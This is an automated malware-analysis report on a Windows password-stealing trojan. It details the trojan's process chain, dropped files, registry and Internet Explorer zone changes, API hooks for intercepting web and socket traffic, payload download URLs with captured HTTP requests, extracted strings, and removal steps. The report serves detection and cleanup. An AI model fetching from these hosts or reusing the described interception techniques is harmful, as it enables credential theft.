MD5: bbae13fd3099b40b0704e5b341308c1b
SHA1: a52bb7c4c3709e2ef53bf6c4b10935eaf9892e0f
SHA256: 064ec5e33d499b35487ec1384af567e4b88b5bb1c0b60cd2b9c8b344d786b909
SSDeep: 384:uHdZNg Ml2 0fkkzWUHh1DjHXRrs905INeZCFtejlIko5dN127BFVn2p4lAnZ8Oh:Q3NXvkkRfDjHXRrs9sINeZEtejlIkoL7
Size: 20256 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-05 06:01:14
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

No specific payload has been found.

Process activity

The Trojan-PSW creates the following process(es):

umvaeb.exe:800
%original file name%.exe:160
nomes.exe:392
realupdater.exe:1932

The Trojan-PSW injects its code into the following process(es):

Explorer.EXE:1680

File activity

The process umvaeb.exe:800 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user% (28672 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (73728 bytes)

The process %original file name%.exe:160 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)

The process nomes.exe:392 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
%Documents and Settings%\%current user%\Application Data\Xyefq (4096 bytes)

The process realupdater.exe:1932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)

Registry activity

The process umvaeb.exe:800 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 6A 3C F9 EE C9 86 33 8A F3 3B 47 09 E6 27 21"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Xyfoleoknam]
"eaijg70" = "CF 79 D5 92 0E 68 7E 28 48 B5 12 54 EC 9C EA 44"

The process %original file name%.exe:160 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 7B 3C 0D F0 E5 BF 68 20 D9 1A E4 E2 6B 49 29"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"realupdater.exe" = "realupdater"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process nomes.exe:392 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 34 EC E9 9D 67 E6 26 33 76 8A 35 7A 55 CC DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process realupdater.exe:1932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Документы"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\Мои документы"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Рабочий стол"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Рабочий стол"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nomes.exe" = "nomes"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 0C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 22 D4 A1 44 23 CD C6 0B 67 6E 20 61 F5 1F 24"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"

The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-PSW deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan-PSW installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle

The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan-PSW installs the following user-mode hooks in USER32.dll:

GetClipboardData
TranslateMessage

The Trojan-PSW installs the following user-mode hooks in Secur32.dll:

DecryptMessage
SealMessage
DeleteSecurityContext

The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:

WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW

The Trojan-PSW installs the following user-mode hooks in ntdll.dll:

LdrLoadDll
NtCreateThread

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://svsmills.com/images/pdf.enc	182.18.150.53
hxxp://japanrareearths.com/img/pdf.enc	182.18.146.98

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /img/pdf.enc HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: japanrareearths.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 11 Mar 2014 12:35:43 GMT

Server: Apache

Last-Modified: Thu, 06 Feb 2014 07:36:02 GMT

Accept-Ranges: bytes

Content-Length: 289558

Content-Type: text/plain
ZZP..U8.d.8.>.8.:..p..87>...>.<.'...2.'...8;7".7>.tB..P
.M...L._._.8.].V.Q...\...K...>...q...Qo\...5.....n.8.r.:....|l.oo&g
t;...5.1.>.8.j.=.U.8...;.]...5.8.=.?.>.X.7... k8.1 ;.8.>.<
.....9..o...i..>...?./...].Jo;?`.<.....;...X...M.[.3nu.Cn.q$d ..
...>.8.>.8.......<...I..G8.,.8.^...>Ex.>.X.\.8.^...^...
>yX...O%.okY^...>.X.....>A....8%..8.^.n.>wX..gX.H.8.^.`.&g
t;E~.>.X...8.^...^.2.>.X.0.>...[.d.8.R.X.B.8.^...>[m.>-
X.z.8U^...^...>...7.8.k.8.^.`.>[email protected].^...>Am.>QX...8W
^...^...>...,.8.k.8.^...>.X.`.X.N.8.^...>Om.>]X...6.^.$"^.
6....a^...>E..>QX...8/^...^.N.>?..?...?.E...i.h.8.0.M.>.-.
n.x...n.?.d.?....d....N..K..i.Po).8..... .).>j..>.{.....3.x.^.ms
=>....0.~.g.ed(jc,..>dl.>......G....5d.I?.8...9..-0.>.;.1X
:...^O4..p1X...&3...;G=/:.<.......:m=n;.....'../X....O9k..J.....79?
.?.='.../4...?.>l....<..h....8..VA...........4.*.......k.x.j.(.J
.8.>...6.......q...2d8.:.......z. N..0.,.x.R.$.R.8a>.....;."....
d..*,.........j>..B=6.G.m./>..............G>.<...>..<
;..>'.....o:....'.v.-.......lT.~.9..../9.<.?o....g.:.<.?.f...
8.m.e.o.c.. (...8..3..........6n...Vn....?n.-....p6fE.^....b8.....1X..
....>.\......dx.o.x.L.......>duc.&M...v.1X9...(... ..%3.N.:..o:.
<...>.....m.4....d..s.8d...Y..M.8dn.....6.."..P.. (Yn._.8d.p.8.?
..X...8.I.....:.V7....n....]....N..O.....2....8.h.....j....../......?.
,.v...s.....i.:..m<.79<l8O<l..1j../.u.?.9.......7...9.7..
<<< skipped >>>

GET /images/pdf.enc HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: svsmills.com

Cache-Control: no-cache

HTTP/1.1 404 Not Found

Date: Tue, 11 Mar 2014 12:35:46 GMT

Server: Apache

Content-Length: 331

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /im
ages/pdf.enc was not found on this server.</p>.<p>Addition
ally, a 404 Not Found.error was encountered while trying to use an Err
orDocument to handle the request.</p>.</body></html>
...

.text

`.data

.idata

@.reloc

Invalid parameter passed to C runtime function.

>$>,>4><>

0123456789

http://www.google.com/

http://www.bing.com/

REPORT

HTTP/1.1

RegDeleteKeyExW

gdiplus.dll

GdiplusShutdown

.TJFZAIY]JD^"

?:527|:!;8

!1 (##!(

Kmv`jn`%fnfnzg,bt3crd~da4

1&,$=OJ-:&#O-

-.ynp<

'2$4>%|903

: 8? 1 !

userenv.dll

del "%s"

if exist "%s" goto d

del /F "%s"

w%fkN

t.Ht$HHt

L$$

m9.td

zcÁ

ntdll.dll

KERNEL32.dll

ExitWindowsEx

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

CryptGetKeyParam

CryptImportKey

CryptDestroyKey

RegCreateKeyExW

RegCloseKey

RegQueryInfoKeyW

RegDeleteKeyW

RegOpenKeyExW

RegFlushKey

RegEnumKeyExW

ADVAPI32.dll

UrlUnescapeA

PathIsURLW

SHLWAPI.dll

ShellExecuteW

SHELL32.dll

Secur32.dll

ole32.dll

GDI32.dll

WS2_32.dll

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertCloseStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXImportCertStore

CRYPT32.dll

HttpSendRequestExA

HttpQueryInfoA

InternetCrackUrlA

HttpOpenRequestA

HttpEndRequestA

HttpAddRequestHeadersA

WININET.dll

OLEAUT32.dll

NETAPI32.dll

IPHLPAPI.DLL

VERSION.dll

msvcrt.dll

9 9$9(9,9094989

> >$>(>,>0>4>|>

00D0K0_0q0z0

:!:(:,:1:8:^:

\StringFileInfo\xx\%s

urlmon.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s

kernel32.dll

launchpadshell.exe

dirclt32.exe

wtng.exe

prologue.exe

pcsws.exe

fdmaster.exe

shell32.dll

cabinet.dll

Wadvapi32.dll

"%s" %s

/c "%s"

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Local Settings\Application Data

Global\{6D2DABD3-6C4A-40B1-99CD-5691B9DB7583}

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   umvaeb.exe:800
   %original file name%.exe:160
   nomes.exe:392
   realupdater.exe:1932
   

3. Delete the original Trojan-PSW file.
   
4. Delete or disinfect the following files created/modified by the Trojan-PSW:
   

   %Documents and Settings%\%current user% (28672 bytes)
   %Documents and Settings%\%current user%\NTUSER.DAT.LOG (17920 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\realupdater.exe (20336 bytes)
   %Documents and Settings%\%current user%\Application Data\Xyefq\umvaeb.exe (693248 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\SWPB639.bat (173 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nomes.exe (607232 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\pdf[1].enc (289558 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OEBBOQ59\desktop.ini (67 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.